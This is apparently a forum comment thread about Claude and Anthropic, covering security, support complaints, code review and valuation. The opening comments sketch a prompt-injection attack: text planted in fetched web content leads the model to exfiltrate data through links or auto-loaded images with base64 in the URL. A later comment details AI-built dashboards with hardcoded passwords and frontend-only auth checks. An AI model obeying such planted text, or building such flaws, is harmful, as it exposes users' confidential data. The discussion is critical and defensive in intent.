It might be lower stakes, but isn't that still a juicy target for data-exfiltration attacks?
In other words, imagine if one of your direct competitors was watching everything your employee read while making spreadsheets and slideshows.
Maliciously constructed text that goes into the LLM from basically anywhere (including, say, fetched stats about a competitor's product from their website) is a potential source of prompt-injection.
Once that happens, exfiltration can be as simple as generating a spreadsheet/doc with a link or small auto-loaded image, and an URL that has data base64'ed into it.
The work BigIP is doing on LLM traffic analysis is cool though.
1. It costs nothing to scatter poisonous data around that'll be infectious for ages
2. Running the exfiltrated-data endpoint is low-traffic and low-complexity
3. Even if it only affects a few targets you've probably recouped your investment.
The nature of LLMs also invites wide-net attacks. While one might tailor for specific models, victims could be anybody. You don't need to predict any idiosyncratic details like filenames, you can drop a phrase like "the most-confidential information that shouldn't be released publicly", and—thanks to the magic of LLM word association—you'll get a pretty good hit-rate. False hallucinations are a problem, but victims are hard at work attempting to minimize it already, and (since morals are already out the window) even plausible-but-false data could be used to sabotage reputations or threaten the same.
If AI is really as wonderous as everybody says, why didn't all the employees of all the AI companies simply type "Claude, file my taxes for me" as a prompt and walk away?
If you're not yet waking up to AI completing tasks for you that you didn't directly ask for, you might be falling behind the curve. A good personal assistant does what you ask, a better personal assistant knows what you need before you do and has it completed before you reach your desk. AI is already starting to reach into the latter category.
(edit: dialled back some unnecessary snark.)
Luckily there is still a significant market for the services.
Currently we don't know the risk, so it is kind of hard to absorb.
Why, they can sell user data to other brokers. Experts indeed! But not in insurance or finance, of course.
But there's a process risk here based on their current practises. I'm hoping those practises change so that I can recommend Claude to everyone I know, but as of now, there's existential risk exposure here that's greater than Google's.
Anthropic's automated systems can and will ban you for pretty arbitrary things; and you won't get human support or Claude – even if you are an enterprise paying out of your nose. And there's 0 redressal unless you go viral on social media. Or know someone who knows someone. See: https://x.com/Whizz_ai/status/2051180043355967802 https://x.com/theo/status/2045618854932734260
And I say that as someone who likes how Anthropic has been training Claude and Opus. I just don't think they're prepared to be the trillion dollar company they've become. They are – in a very real way – suffering from success. Which is extremely inconvenient to be on the receiving end of when you're on a deadline.
Code review has become unbearable because before AI, developers were reviewing code as they went writing it in the first place. Granted, never perfect and why a second person reviewing code was (is?) a best practice. But effectively there was always some level of code review happening as developers wrote code.
I fear it is way more boring to review financial and medical documents completely written by AI than it is to write (and at the same time review) by yourself. And way more dangerous to ship mistakes than in most software.
But more often than not that developer ends up reviewing far more lines of code due to the typical verbosity of an LLM.
The analysis itself; I'm doing it by hand.
Far too often people think productivity is the point. Maybe the point is developer's understanding of the product IS the product?
You're not engineering black boxes, you're engineering legible boxes.
For example, Codex can review code written by Claude, etc.
Here's some of the horrible things i've seen. Frontend dashboard with PHI/PII deployed via vercel/next because AI told them how to get their site online. Login is hardcoded into the frontend so anyone with inspect can find the password.
Another "fixed" dashboard deployed the same way. This time they added firebase auth so they got sign in with Google added with only logging into our domain. Wait how would they be able to create a token for our domain? They didn't the frontend just blocks domains from calling firebase.auth but firebase doesn't care. So simply calling the function in the console lets me login with any gmail account....
They also where showing me their RBAC with firebase. Again they don't have access to our Orgnization/Directory/Groups. So i wondered how they did this.. wouldn't you guess its a hardcoded list of approved users. You can literally call firebase.auth and sign in anonymously. Again only the frontend checks the email addresses. So now that i have a firebase auth all the backend firebase function just check that you have auth'd. So i can make any request i want to the backend. The frontend simply won't show me the code.
I could go on and on about the stupidity levels I'm facing but I don't feel like crashing out.
All I can say is this tool is only useful if you already know how to correctly implement these things. Does it save me time sure but I have to call it retarded and explain why not to do things. Honestly I feel like claude is good for people who like to gamble. When it gets it right it feels great but I don't want to roll the dice 30 times to get it correct.
Sadly this sounds like par for the course when it comes to tech. Too many messages and requests for help depend on knowing someone in the right slack groups.
At least, that's really the message this sends in my opinion
You're a funny one aren't you...
Meet "Fin" Anthropic's "where support questions go to die" so-called-support bot, created by Intercom but powered by Anthropic.
Maybe it's an internal in-joke in the Anthropic offices ... "Fin" in french means "End".
I don't know anyone who has had a positive experience with "Fin" .... or ever spoken to a human at Anthropic support for that matter, even if you ask "Fin" to escalate.
Customer support and safety are cost centers. It doesn’t scale like software does and no one’s KPIs are going to improve dramatically if you provide support beyond a point.
AI and LLMs are the cool tech, and the most important thing is to push the frontier. Money spent elsewhere is money not spent on R&D.
It would be hilarious if it wasn’t the GDPs of nations being spent on this.
It also makes no sense to me there are people qualified to participate in these secondary markets who are that stupid, but here we are.
And for participating there, there is not "a qualification that allows you to enter", its other metrics.
If Anthropics valuation makes no sense - fair enough - but why is then OAI evaluation of 850b correct?